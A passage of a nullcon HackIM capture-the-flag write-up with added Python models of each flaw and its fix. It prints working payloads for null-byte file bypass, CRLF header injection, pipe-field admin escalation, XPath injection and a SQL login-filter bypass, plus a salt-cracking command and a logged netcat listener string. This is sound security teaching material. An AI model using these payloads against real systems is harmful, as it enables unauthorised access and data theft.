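            base = ord('A') if ch.isupper() else ord('a')
            k = -schedule(i) if decrypt else schedule(i)
            out.append(chr((ord(ch) - base + k) % 26 + base))
        else:
            out.append(ch)
    return ''.join(out)

def ramp(i):
    """What the author observed on the first words: the shift grows by one per character."""
    return i % 26

def fitted(i):
    """Schedule fitted against the whole flag: rising on 0-26 and 53-78, falling elsewhere."""
    rising = i <= 26 or 53 <= i <= 78
    return i % 26 if rising else (-i) % 26

if __name__ == "__main__":
    print(shifts_from_crib(CIPHER, "Men at"))   # [0, 1, 2, None, 4, 5]
    print(rotate(CIPHER, ramp)[:27])            # Men at some time are master
    print(rotate(CIPHER, fitted))               # the full quotation
```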
Programming Level 2: Pascal’s Triangle
Official Hint: N/A
Page Source: <!-- ex: The sum of all middle terms till first 6 rows is 9 -->
Description: The Flag is the sum of all middle terms till first 1337 rows of Pascal's Triangle
Analysis: This seemed easy at first sight. My first expectation was to get some cooked-up code, but that really didn’t work out; all I got was algorithms and some frustrated guy like me crying on the discussion forums to get their erroneous triangle code working. Googled Pascal triangle, went through Wikipedia about Pascal's triangle and WolframAlpha's Pascal triangle; frustration takes you to any height of paranormal activities. After spidering and crawling through the links, I came across some useful resources:
  http://rosettacode.org/wiki/Pascal's_triangle
  http://www.mathsisfun.com/pascals-triangle.html
  http://www.mathwords.com/b/binomial_coefficients_pascal.htm
  http://www.youtube.com/watch?v=OMr9ZF1jgNc
So all up, time to do some serious coding.
  - The challenge considers the middle term of odd rows.
  - Wrote code in C and hoped it would work out; failed.
  - Looked for some Java code, compiled successfully, but when I executed it I was staring at my LCD; the program went on running for more than 30 seconds on my i5. That was stack overflow.
  - Time for some manual work again; looked it over and realized that binomial coefficients can be essential to get me the flag.
  - Worked at it again, for the 3rd time now in Python, with unexpected hope; executed it, got something, and voila!!! That was the flag. This was the Python script:
       #!/usr/bin/python
       from math import factorial
       p = 0   # middle index of the current row
       s = 0   # running sum of the middle terms
       for n in range(0, 1337, 2):       # rows 0, 2, 4, ..., 1336 (the odd rows counted from 1) have a single middle term
           s += factorial(n) // (factorial(p) * factorial(n - p))   # binomial coefficient C(n, n/2); // keeps it an exact integer
           p += 1
       print(s)
Flag: 4365932474188423707093600683230364311423941198777278660206654343120587216667436233239359631257671906424254797004032326756653034333310397082007259357870623427662432460587818667097226705645987145656659456934356498862160032628647508069786551862253737753435645565104842509752373488183866315706330467111008238321829445373767874422156015835789685633070319435688289548287438365157627110284786
6170999680296497
Programming Level 3: Your Brainfuck Sir...
Official Hint: N/A
Page Source: <!-- md5sum: 4f1ec9481c0f0ae0a199ea5c8dedf62d -->
Description: Debug bfcode to get the flag
Analysis: I had encountered brainfuck earlier, but never this way. A Google search for a brainfuck interpreter resulted in http://www.iamcal.com/misc/bf_debug/. Executed the given code without any input in the interpreter and observed the result. Something appeared partially which didn’t seem to carry any useful meaning. Tried with some random input and got the same output again and again. Maybe a defect with the interpreter, LOL. It’s MANUAL time now. Glanced across the lines in Wikipedia about brainfuck programming. There I got to see the small “Hello World” program. I executed it in the interpreter and got the output successfully. Observed that in the “Hello World” brainfuck program each line was ending with a period. The period has a special meaning in brainfuck: it is the same as a print statement, which the given brainfuck code was missing. GOT IT!!! So appending a period at the end of each line was all it took to get the flag.
Flag: ...In fact, never ever use gets() or sprintf(), period. If you do we will send evil dwarfs after you..

Programming Level 4: Substitute Problem
Official Hint: N/A
Page Source: <!-- md5sum: 31178aa23ef43566009d97f38a470279 -->
Description: deobfus
Analysis: There wasn’t much to do with this; everything was self-explanatory in the page itself. The only thing required by this challenge was plenty of time with lots of concentration. For me, it took nearly 2 continuous hours to get through all the iterations. Probably some hardcore programmer would have written a simple piece of code to get it done in a few seconds. So my time complexity with this problem was exponentially equivalent to the programmer's.
The final iteration revealed the code as:
  SEDULoUSLY ESCHEw oBFUSCAToRY HYPERVERBoSITY A N D P R o L I X I T Y 8 4 R o E D Y GREEN
On an attempt with variation of case, got the final flag.
Flag: sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy green
  • 14. Programming Level 5 Official Hint: N/A Page Source: Nothing Interesting Description: A pinch of salt for your coffee, Sir? Analysis: I’m really bad at brute forcing and guessing un-natural passwords. With hope to get it correct this time, I went to salt.asp page and generated hash for few random keywords. Sorry wouldn’t share those, crazy ones, nearly killed my system with overheating: D The basic idea was to crack the hash and identify the salt which was the flag to complete this challenge. I looked around for the md5 cracker and got one at http://3.14.by/en/md5. Next i tried to crack the hash for the random keywords. After a while, my system temperature went above critical level and had to shutdown the process, that was really disgusting job to watch over the LCD and wait for the cracker to do its job, the cracker doesn’t seems to understand that my system is not a blade server or may be I don’t. On a final note, I decided to take hash for either single word or digit and crack it. Again the same boring task, at first set I generated the hash from 0-10, and finally on second attempt with the hash for “1” I got my flag. Working Steps: 1. On the page salt.asp input password as 1. 2. The hash thus generated for my system was “243dc4f11700aa3bd6c7de312bb0ca31” (Note: each system will generate a unique hash). 3. Fire up the windows console , and type the following at the command prompt: barswf_cuda_x32.exe -h 243dc4f11700aa3bd6c7de312bb0ca31 -c 0a 4. After approx 2 minutes on my i5, the cracker successfully displayed the result.
  • 15. 5. There we had our key as : “1c183e7” 6. That means "1" + "salt("c183e7"). Since hash = Algo(password+salt) 7. In the given problem, 243dc4f11700aa3bd6c7de312bb0ca31=md5(1+c183e7) 8. And finally my flag was c183e7( Note: Each system will have a unique flag) Flag: c183e7 Web levels Web Level 1 Official Hint: N/A Page Source: Nothing Interesting Description: Can you view the bytes in password.asp from Me? Analysis: As the description suggests, it was null byte injection. I had come across a problem on null byte on one of the wargame.Let’s understand the problem. Our challenge was to read the information from the file password.asp which somehow was protected by the server. Here we can observe in the given URL that default parameter is test.txt, Multiple questions can arise here, as such, why only test.txt as the parameter? If you don't do anything with a parameter, why take one? Assume a real time application from my perspective, the idea with this level is that: We have an application which takes a filename from us, reads it, and shows it to us. We found an example of input, "test.txt".We know there is sensitive information in password.asp, But we can't get password.asp. So let's imagine that whoever wrote this application which reads any file we tell it to, wanted to keep us from reading anything but files which end in ".txt".So any input which we give it that doesn't end in ".txt" is rejected. So here's the problem: How do we get a file which ends in ".asp" when the filename we provide has to end in ".txt"? The answer obviously is null byte but that would be a partial answer in the context of the question “HOW?” In languages like ASP and PHP, the null byte doesn't end a string, it’s just another character. In C-based languages (C, C++, C#) a null byte means the end of a string. So if we give a PHP script a filename to open that has a null byte, it's different in PHP and in the OS. So the filename might be "hello%00blah" to PHP. 
but it would be "hello" to the operating system. Some applications append a file extension to any filename we give them: we give "hello" and they open "hello.txt". That is why we send "hello.php%00": PHP sees "hello.php\0.txt", the extension check passes, and the OS opens "hello.php". (PHP 5.3.4 and later reject filesystem paths containing a null byte, so the trick only works against older interpreters; the level's classic ASP backend was vulnerable.) And after this long explanation, hence the flag.

Flag: http://www.nullcon.net/challenge/wlevel-1-proc.asp?input=password.asp%00.txt
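For Programming Level 5 above, the following is an added example (not code from the writeup, and not BarsWF) showing the shortcut the level rewards: because the player picks the password, only the salt has to be searched, and md5(password + salt) is assumed to be exactly how salt.asp computes the hash (the page implies it but does not show the server code). The demo salt "c18", the salt alphabet and the search length are assumptions; the real salt in the writeup was 6 lowercase hex characters.

```python
import hashlib
import itertools
from typing import Optional


def md5_hex(text: str) -> str:
    """MD5 of a UTF-8 string as lowercase hex, the form salt.asp is assumed to return."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def search_space(salt_len: int, alphabet: str = "0123456789abcdef") -> int:
    """Number of candidate salts; check this before starting a long run."""
    return len(alphabet) ** salt_len


def recover_salt(target_hash: str, known_password: str, salt_len: int,
                 alphabet: str = "0123456789abcdef") -> Optional[str]:
    """Exhaustively try every salt of salt_len characters over `alphabet` and
    return the one for which md5(known_password + salt) == target_hash.

    Because the password is known, the search is len(alphabet) ** salt_len
    instead of the whole plaintext.  For the level's 6-character lowercase-hex
    salt that is 16 ** 6 = 16,777,216 hashes, which pure Python finishes in
    well under an hour on one core and a GPU cracker in seconds.
    """
    target_hash = target_hash.lower()
    for combo in itertools.product(alphabet, repeat=salt_len):
        salt = "".join(combo)
        if md5_hex(known_password + salt) == target_hash:
            return salt
    return None


if __name__ == "__main__":
    # Constructed demo: invent a short salt, hash it the way the challenge does,
    # then recover it from the hash and the known password "1".
    demo_salt = "c18"                      # assumption, not the level's real salt
    demo_hash = md5_hex("1" + demo_salt)
    print("recovered salt:", recover_salt(demo_hash, "1", len(demo_salt)))  # c18
    print("candidates for a 6-hex-char salt:", search_space(6))            # 16777216
```

With a known one-character password the cracker's job is the salt alone; the writeup's BarsWF run searched the full 7-character plaintext over digits plus lowercase (36 ** 7 candidates), which is why it needed a GPU and two minutes.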
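The Web Level 1 mechanism, as an added example that is not part of the original writeup and does not reproduce the nullcon server code: the vulnerable function models an extension check done on the percent-decoded string while the file API truncates at the first NUL, and the hardened function rejects control characters and path components before re-checking the exact name that will be opened. ALLOWED_EXT, BASE_DIR and the split-at-NUL model of the C file API are assumptions.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

ALLOWED_EXT = ".txt"
BASE_DIR = "/var/www/challenge"   # assumed document root for the example


def vulnerable_resolve(user_input: str) -> Optional[str]:
    """Model of the level's flawed check.

    The web layer percent-decodes the parameter, keeps the embedded NUL as an
    ordinary character and only inspects the suffix.  The C-level file API
    stops reading the name at the first NUL, so the path actually opened is
    whatever preceded it.  Returns the filename the OS would open, or None if
    the extension check rejects the input.
    """
    decoded = unquote(user_input)              # "%00" -> "\x00"
    if not decoded.endswith(ALLOWED_EXT):      # the only check the app performs
        return None
    return decoded.split("\x00", 1)[0]         # what a NUL-terminated C string holds


def hardened_resolve(user_input: str) -> Optional[str]:
    """Validate the decoded name, not just its suffix:
    - reject any control character (NUL included) before anything else;
    - accept only a bare basename, so ../ cannot leave the directory;
    - re-check the extension on the exact string that will be opened.
    """
    decoded = unquote(user_input)
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in decoded):
        return None
    name = posixpath.basename(decoded)
    if not name or name != decoded or not name.endswith(ALLOWED_EXT):
        return None
    return name


def open_path(name: str) -> str:
    """Where the validated file would be opened, joined under the document root."""
    return posixpath.join(BASE_DIR, name)
```

CPython's own open() refuses a name containing a NUL (ValueError: embedded null byte), which is the same check the hardened version performs up front; languages or runtimes that pass the raw bytes through to the C library are the ones exposed to this bypass.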
Web Level 2

Official Hint: Judgment of Solomon
Page Source: Nothing Interesting
Description: Can you redirect ME to hackim.null.co.in?

Analysis: I had to go through the hint to get this one done. After a few attempts with variations of the parameter, I went through the story on Wikipedia. In summary, "Solomon suggested that the baby be split in half and each half given to one of the women claiming to be the mother". So the hint refers to the word "split". A quick search for "HTTP Splitting" returned several results. I studied a few of them, with their various PoCs, and realized that I had spent most of my time injecting into the HTTP response rather than redirecting it. The page parameter is presumably reflected into a response header without stripping CR and LF, so a %0d%0a sequence ends the current header line and lets us add lines of our own; injecting a 302 status line and a Location header makes the browser follow the redirect. I finally got the level done after several parameter variations.

Flag: http://www.nullcon.net/challenge/wlevel-2-proc.asp?page=%0d%0aHTTP/1.0%20302%20Found%0d%0aLocation:%20hackim.null.co.in

===========================================================================================

Web Level 3

Official Hint: Proxies are golden friends
Page Source: <!-- If you're still reading, better register Mate :)-->
Description: Click here to Login || Click here to Register

Analysis: In this level we were given two options, register and login. I clicked on both and went through the page source; nothing seemed interesting. I thought it could be vulnerable to some kind of injection. Next I filled in the form and registered. My registration was successful, which I had not expected, but on logging in with those credentials all I got was the error message "Only ADMINS are Welcome!". I came back to the registration page and tried another input. This time the page source had something interesting, in this format:

<!--Debug Info: INSERT 'uname|pass|uname|uname@localhost.com|admin:no|comment:new user' INTO USER DB FILE -->

So it was all here: the record written to the database is a pipe-separated line, and the admin:no field is added by the server after our form fields.
There was not much more to do; next I used Burp Suite to check how the parameters were passed.
In the last line of the Burp window we can observe how the parameters are passed to the server. The format was similar to what we saw in the post-registration page source. So all we had to do was append admin:yes in that format: because the server joins our fields with "|" and never escapes the separator, a "|admin:yes" inside the email field smuggles an extra admin field into the record. Even this process annoyed me a lot, since I could not get it right on the first attempt. The correct format was:

username=me.admin&name=admin&password=admin&email=admin%40localhost.com|admin:yes&Submit=Register

And finally I registered myself as the admin and got the flag.

Flag: b3149ecea4628efd23d2f86e5a723472
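The header injection used in Web Level 2 above, as an added example that is not code from the writeup and does not reproduce wlevel-2-proc.asp: the vulnerable builder copies the decoded page value into a response header (which header the real page used is unknown; X-Page is assumed), the parser shows what a lenient client makes of the result, and the safe builder applies the CR/LF check every modern HTTP library performs. PAYLOAD is the exact value from the writeup's flag URL.

```python
from typing import List, Optional, Tuple
from urllib.parse import unquote

# The decoded ?page= value from the writeup's flag URL.
PAYLOAD = "%0d%0aHTTP/1.0%20302%20Found%0d%0aLocation:%20hackim.null.co.in"


def _render(value: str) -> bytes:
    return ("HTTP/1.0 200 OK\r\n"
            "Content-Type: text/html\r\n"
            f"X-Page: {value}\r\n"          # assumed reflection point
            "\r\n"
            "<html>ok</html>").encode("latin-1")


def vulnerable_response(page: str) -> bytes:
    """Model of the bug: the decoded parameter is copied into a header verbatim."""
    return _render(unquote(page))


def safe_response(page: str) -> bytes:
    """Same builder, but CR/LF in a header value is refused after decoding
    (Python's http.client raises ValueError for such values in the same way)."""
    value = unquote(page)
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF in header value")
    return _render(value)


def rejects_crlf(page: str) -> bool:
    """True if safe_response refuses the value."""
    try:
        safe_response(page)
    except ValueError:
        return True
    return False


def parse_headers(raw: bytes) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a raw response like a lenient client: status line, then one
    header per CRLF-separated line up to the first blank line."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, val = line.partition(":")
        headers.append((name.strip(), val.strip()))
    return lines[0], headers


def injected_location(page: str) -> Optional[str]:
    """The Location a client would follow after the injection, if any."""
    _status, headers = parse_headers(vulnerable_response(page))
    for name, val in headers:
        if name.lower() == "location":
            return val
    return None
```

Run parse_headers(vulnerable_response(PAYLOAD)) and the header list contains ("X-Page", ""), an extra line "HTTP/1.0 302 Found" and ("Location", "hackim.null.co.in"): the attacker's lines sit inside the server's own header block, which is all a redirect needs from a client that trusts whatever Location it sees.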
Web Level 4: Can You Get Me all the Data?

Official Hint: if you think you've seen all the data, i'm afraid you're mistaken
Page Source: Nothing Interesting
Description: 2007 && 2002

Analysis: At the beginning of this level I had no idea what was required. After hovering around the links for a few hard hours, I found a useful page on OWASP: https://www.owasp.org/index.php/Interpreter_Injection. There were a few interesting attack vectors, which I tried blindly, with no luck. I read the description again and understood it was asking to reveal data from the server, and realized I had been trying injection parameters without thinking. Next I went looking for cheat sheets of attack vectors, collected a few and studied them, but they were beyond my understanding. I asked in the IRC channel and got a clue, which again required blind traversal. Eventually I came across an article, http://palpapers.plynt.com/issues/2005Jul/xpath-injection/, which describes XPath injection in simple language, and a good cheat sheet at http://www.simple-talk.com/dotnet/.net-framework/xpath,-css,-dom-and-selenium-the-rosetta-stone/. I tried those attack vectors and got the flag, unexpectedly, with this one:

input='] | /* | /foo[bar='

Why it works: the server presumably builds an XPath expression of the form //node[field='INPUT'] around our value. The leading '] closes the predicate, | /* unions in every element under the document root (hence "all the data"), and the trailing /foo[bar=' opens a fresh predicate that the application's own closing '] completes, so the whole expression stays syntactically valid. I completed this level blindly, a bad way to do it.

Flag: myworthinessisallmydoubthismeritallmyfearcontrastingwhichmyqualitydoeshoweverappear

Web Level 5

Official Hint: It's SQLi
Page Source: Nothing Interesting
Description: Do You Have What IT Takes to Break into the World's Most Secure Login System?

Analysis: The very first thing anyone would try after one look at the page is the most common SQL injection (' or 1=1--), and I did the same. As usual I was wrong again. Assuming it to be a blind SQLi, I looked around www.1337day.com and www.exploit-db.com hoping for some good papers.
On the very first link on exploit-db I found a paper on advanced blind SQLi; it listed attack vectors for getting past web application firewalls. Trying those, on the second attempt '<>'1 as both username and password got me the flag. The reason it works: the query becomes WHERE username=''<>'1' AND password=''<>'1'; since = and <> share the same precedence and are evaluated left to right, each side is (column='') <> '1', which is true for every row, and the payload contains none of the tokens (spaces, or, --) that a filter in front of the login would typically block.

Flag: 47c1b025fa18ea96c33fbb6718688c0f
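The Web Level 5 bypass reproduced against a real SQL engine, as an added example that is not code from the writeup and does not reproduce the nullcon login: SQLite's stdlib binding stands in for the level's unknown database, the users table and the keyword blocklist are constructed here to model the "web firewall" the writeup refers to, and the parameterised version shows the fix.

```python
import sqlite3

# Constructed user table for the example; the level's real schema is unknown.
_SCHEMA = [
    "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)",
    "INSERT INTO users (username, password) VALUES ('admin', 's3cr3t')",
    "INSERT INTO users (username, password) VALUES ('bob', 'hunter2')",
]

# Naive blocklist standing in for the web firewall the level appeared to use.
BLOCKED = ("or", "--", " ", "/*", "#", ";")


def _db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    for stmt in _SCHEMA:
        con.execute(stmt)
    return con


def waf_allows(value: str) -> bool:
    """Reject input containing any blocked token (case-insensitive)."""
    v = value.lower()
    return not any(tok in v for tok in BLOCKED)


def rendered_query(username: str, password: str) -> str:
    """The SQL the vulnerable path runs; with '<>'1 it reads
    ... WHERE username=''<>'1' AND password=''<>'1', i.e. (username='')<>'1',
    which is true for every row because 0 <> '1'."""
    return (f"SELECT id FROM users WHERE username='{username}' "
            f"AND password='{password}'")


def vulnerable_login(username: str, password: str) -> bool:
    """String-concatenated query behind a keyword blocklist (the level's mistake)."""
    if not (waf_allows(username) and waf_allows(password)):
        return False
    return _db().execute(rendered_query(username, password)).fetchone() is not None


def safe_login(username: str, password: str) -> bool:
    """Parameterised query: the input is data, never SQL syntax, so no blocklist is needed."""
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return _db().execute(sql, (username, password)).fetchone() is not None
```

The blocklist also rejects legitimate users whose names contain "or" (Morgan, Victoria), which is the usual sign that filtering is being asked to do a job only parameterisation can do.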
Reverse Engineering Levels

Reverse Engineering 1: Basic Test

Official Hint: N/A
Page Source: <!-- md5sum: 9d428bdcb07127ff4358f7d487445470 -->
Description: justdoit.exe

Analysis: The given binary seemed suspicious, so before executing it I decided to analyze it and verify that it was safe to run. I loaded the binary into a hex editor; the section headers showed it was UPX packed. I unpacked it with "Universal Extractor" and looked again, without conclusion, and finally executed it inside a VM and watched its behaviour. At first I couldn't get anything from it, but after a few more runs I saw the keyboard automation done by the exe. A Google search for "keyboard automation" listed AutoHotkey first, which led me to Exe2Ahk at http://www.autohotkey.com/download/Exe2Ahk.exe. After successful decompilation, I found the flag in plain text.

Flag: We could talk all day about what AutoHotKey can do for an online poker player

Reverse Engineering 2: Ask nicely, it will give you what you want

Official Hint: Take another path.. in general look for interesting code blocks & execute them.. code can be anywhere in the PE, even in data | Resource? No Resource
Page Source: <!-- md5sum: c786287c7825784a85413695a9e319fc -->
Description: HackIM.exe

Analysis: I consider this the most insane level of the whole CTF. I spent nearly two days getting past it. To understand the binary I downloaded nearly every tool Google returned for the string "PE", went through various articles on reversing PE files and, worst of all, switched between three different debuggers one by one. Ultimately, after tracing the program flow several times in OllyDbg, the following steps produced the flag:

1. As the hint said "No Resource", I loaded the PE into Resource Hacker to see what exactly that meant, and encountered the following error.
So it was clear from this error that something was wrong with the resource section.
2. I turned to OllyDbg, loaded the PE and went to the memory window (ALT+M).
3. At address 0040C000 there was the .rsrc (resource) section. I changed the access on the section from Read to Full Access: a section mapped read-only is not executable, and code placed in it faults as soon as it runs.
4. I tried running the program but got nothing useful. Reading the hint again, it was asking to execute the resource section.
5. So it was time to place a jump instruction somewhere so that the resource section would execute. I went back to the CPU window (ALT+C).
6. Just below the program entry point, at address 00401273, there was a JMP instruction.
7. So all I had to do was point that jump at the resource section, address 0040C000.
8. Running the program then gave me the flag in a message box.

Flag: AreYouHappyNow?
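The check behind step 3 of Reverse Engineering 2 above, as an added example that is not code from the writeup and not HackIM.exe itself: a section-table walk that reports which sections carry IMAGE_SCN_MEM_EXECUTE and which section a debugger address such as 0040C000 falls in. The sample PE is constructed in build_sample_pe with headers only (two sections, no optional header) and the default image base 0x400000 is an assumption taken from the addresses in the writeup.

```python
import struct
from typing import Dict, List, Optional

# Section characteristic bits from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

_COFF = struct.Struct("<HHIIIHH")          # IMAGE_FILE_HEADER, 20 bytes
_SECTION = struct.Struct("<8sIIIIIIHHI")   # IMAGE_SECTION_HEADER, 40 bytes


def parse_sections(pe: bytes) -> List[Dict]:
    """Return the section table of a PE image as a list of dicts."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (_machine, n_sections, _ts, _symtab, _nsyms,
     opt_size, _chars) = _COFF.unpack_from(pe, e_lfanew + 4)
    table = e_lfanew + 4 + _COFF.size + opt_size   # skip the optional header by its declared size
    sections = []
    for i in range(n_sections):
        (name, vsize, va, raw_size, raw_ptr, _rel, _lin,
         _nrel, _nlin, flags) = _SECTION.unpack_from(pe, table + i * _SECTION.size)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va,
            "virtual_size": vsize,
            "raw_offset": raw_ptr,
            "raw_size": raw_size,
            "characteristics": flags,
            "executable": bool(flags & IMAGE_SCN_MEM_EXECUTE),
            "writable": bool(flags & IMAGE_SCN_MEM_WRITE),
        })
    return sections


def section_for_address(sections: List[Dict], address: int,
                        image_base: int = 0x400000) -> Optional[Dict]:
    """Map a virtual address as shown by the debugger to its section."""
    rva = address - image_base
    for s in sections:
        span = max(s["virtual_size"], s["raw_size"])
        if s["virtual_address"] <= rva < s["virtual_address"] + span:
            return s
    return None


def build_sample_pe() -> bytes:
    """Constructed minimal PE: DOS stub, COFF header, a .text and a read-only
    .rsrc section.  SizeOfOptionalHeader is 0, which no linker emits, but the
    parser honours the declared size so the walk above still works."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)           # e_lfanew = 0x40
    coff = b"PE\0\0" + _COFF.pack(0x14C, 2, 0, 0, 0, 0, 0x0102)  # i386, 2 sections, EXE
    text = _SECTION.pack(b".text", 0x9000, 0x1000, 0x9000, 0x400, 0, 0, 0, 0,
                         IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    rsrc = _SECTION.pack(b".rsrc", 0x1000, 0xC000, 0x1000, 0x9400, 0, 0, 0, 0,
                         IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ)
    return dos + coff + text + rsrc
```

Changing the access in OllyDbg only alters the live page protection for that debugging session; to make the redirected jump survive outside the debugger, the EXECUTE bit has to be set in .rsrc's Characteristics in the file as well as the JMP target patched.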
Reverse Engineering 3: null Mobile Android App

Official Hint: N/A
Page Source: <!-- md5sum: fd81ba87c0edc1f37250e680a49260d8 -->
Description: We're proud to announce the null Mobile Android App Project; however the application is currently in Beta Phase and requires lot of attention from the testers. In keeping with the spirit of HackIM we've hidden a Flag inside. Your task is to find the Flag.

Analysis: I did not have as hard a time with this one. An APK is a ZIP archive, so I unpacked it with WinRAR and went through the contents. Inside the folder res/raw there were two files, code.js and junk.php. The JavaScript inside code.js was unformatted; I formatted it with http://www.jsbeautifier.org and read through it, but found nothing interesting. Next I opened junk.php in UltraEdit, and after careful observation, at line 72, I found a packed JavaScript function. The online tool at http://www.strictly-software.com/unpacker (which handles the common eval(function(p,a,c,k,e,d)...) packer) unpacked it, revealing the flag inside.

Flag: Do not let what you cannot do interfere with what you can do.

Reverse Engineering 4

Official Hint: we've updated the binary with hints, request all to download again to proceed
Page Source:
<!-- md5sum: 7c87b2bfe4e02dbb32e2c3067cb93692 -->
<!-- <center><h3><a href="data/script">script</a></h3></center> -->
<!-- md5sum: 849f2d8c6e22604cba8fe4904803de10 -->
Description: REL4 UPDATE: WE have updated the binary with some hints inbuilt, Request all to download new RE binary to proceed.

Analysis: My first step with the given file was to identify its type. I used the TrID file identifier, also available online at http://mark0.net/onlinetrid.aspx. The result showed an ELF binary, which I cross-checked on the terminal:
The binary was stripped. I tried executing it and was greeted with the following error. I tried strace and ltrace but could not learn much from their output. The error said something about a time machine, so I googled for anything interesting on time machines, without finding anything useful. The next thing I did was to set the system date back to some earlier year; I changed it to 2000. Running the binary again, there was no error, but no flag either. I tried passing some parameters, but that did not help. Next I opened a new terminal and listed the running processes with ps -aux, and got a long list. It was difficult to pick anything out, so I filtered it with

ps -aux | grep script2

and, unexpectedly, saw a shell script being run. Reading it, our flag was there in plain text.

Flag: Nature has neither kernel nor shell; she is everything at once

Reverse Engineering 5: Got Dumped :(

Official Hint:
Page Source: <!-- md5sum: 043e4cc85c519723fad18dce7502371c -->
Description: lol.rar

Analysis: This challenge was about crash dump analysis. I opened the file in a hex editor and from the first few lines got the idea that it was a Windows crash dump. Next I installed WinDbg with proper symbol configuration and loaded the dump into it. I was unaware of this kind of analysis and went through a few links on Google, which gave me some good information and a few cheat sheets. Ultimately the following steps helped me understand the dump:

1. First we had to identify the executable that caused the crash. The command !analyze -v showed that stub.exe caused the crash.
2. Next we had to extract stub.exe from the dump to analyze it. For this there is a SOS extension used for .NET debugging, which can dump the loaded DLLs and EXEs.
3. .load clr10sos.dll
4. !sam folder_location
5. Now we had stub.exe. Next I loaded stub.exe into OllyDbg.
Stepping into the instructions, I realized that the jump led to the part of the code that crashes. I tried to bypass it by jumping to the MessageBox call; I got the message box, but there was no flag in it. I went back to WinDbg and looked up the process ID, since there was a GetProcessId call in the assembly. The PID was 0xA60, so I patched the GetProcessId call to return 0xA60 (the flag is derived from the PID the process had when the dump was taken, so the value has to match the dump, not the live process), and finally got the flag.
Flag: TheLastSamurai

Log Analysis

Log Analysis 1: Basic

Official Hint: N/A
Page Source: <!-- md5sum: 1e2612e8ff3d4651c7d5fc67f2797906 -->
Description: report

Analysis: In this challenge the log was not too large, but it took a long time to understand; every line had a useful piece of information. Carefully going through the lines, I found something very interesting on line 31:

+ OSVDB-3268: GET /challenge/logically_insane/ : Directory indexing is enabled: /challenge/logically_insane/

(The "+ OSVDB-nnnn:" line format is Nikto's; 3268 is its finding for directory listing.) I checked the directory and found two files, but realized at once that the game was still on: "Ask the proper question to get the proper answer". The page source brought me closer to the flag, with a hint in a comment:

<!-- askmelater.asp?question=? -->

And to my surprise, my very first guess got the flag. HAPPY!!! The final URL was:

http://nullcon.net/challenge/logically_insane/askmelater.asp?question=flag

Flag: 6bb61e3b7bce0931da574d19d1d82c88
Log Analysis 2: Mystery Password

Official Hint: N/A
Page Source: <!-- md5sum: 6eebd22df057377a436dad2d97fad8b6 -->
Description: log3.pcap

Analysis: There was not much to this challenge. The capture was unexpectedly small, and anyone could solve it within a few minutes. I opened it in Wireshark. The easiest way to read it was to look at the TCP stream: right-click on a packet > Follow TCP Stream opened the stream window. The very last line of the stream content revealed the password, and after a few more attempts I got the flag.

Flag: ..Supp@..adm1n
Log Analysis 3: Clever Intruder

Official Hint: N/A
Page Source: <!-- md5sum: 396df3308184a77890cb708f05915f29 -->
Description: access.rar

Analysis: A 25 MB log with approximately 1 lakh (100,000) lines. It seemed nearly impossible to analyze by hand, so I thought for a while and looked around Google for a good log explorer to make the task easier. I found a few, but they were all useless and I wasted my time; I came back to my old favourite UltraEdit and gave the lines a quick glance. I learnt from the logs that:
- the entries were generated by different scanners;
- there was variation in the source IP;
- the scanning was performed on the same date, within a fixed uninterrupted period;
- the HTTP status code for most requests was 404.

The last finding proved essential: assuming that nothing interesting would come from a "Page Not Found" response, the 404 lines could be set aside. I tried my best to separate those entries into different tabs in UltraEdit. This was a very hectic job; with a little more knowledge it would not have been so tough to get past this hurdle, and this level made me realize how poor my tooling was. After long hours of work, I eventually came across a line carrying the base64-encoded string bmMgLWwgLXAgNjY2Ng==, which decodes to nc -l -p 6666 (a netcat listener on port 6666, i.e. a bind shell being set up). In the original log this was on line 37409 (UltraEdit).

Flag:
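The filtering the writeup did by hand in UltraEdit for Log Analysis 3 above, as an added example that is not code from the writeup: drop lines whose status is 404, pull base64-looking tokens out of the request path and keep only those that decode to readable text. SAMPLE_LOG is constructed in Apache combined format (the real access.rar is not reproduced); only the encoded string bmMgLWwgLXAgNjY2Ng== is taken from the writeup, and its placement in a query parameter is an assumption.

```python
import base64
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed sample lines; line 4 carries the string the writeup found.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Feb/2012:10:01:12 +0530] "GET /robots.txt HTTP/1.1" 404 209 "-" "Nikto/2.1.4"
10.0.0.5 - - [04/Feb/2012:10:01:13 +0530] "GET /admin/ HTTP/1.1" 404 209 "-" "Nikto/2.1.4"
10.0.0.9 - - [04/Feb/2012:10:02:40 +0530] "GET /index.php?page=home HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [04/Feb/2012:10:03:01 +0530] "GET /index.php?page=bmMgLWwgLXAgNjY2Ng== HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.0.9 - - [04/Feb/2012:10:03:05 +0530] "GET /images/aGVsbG8= HTTP/1.1" 404 209 "-" "Mozilla/5.0"
"""

_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
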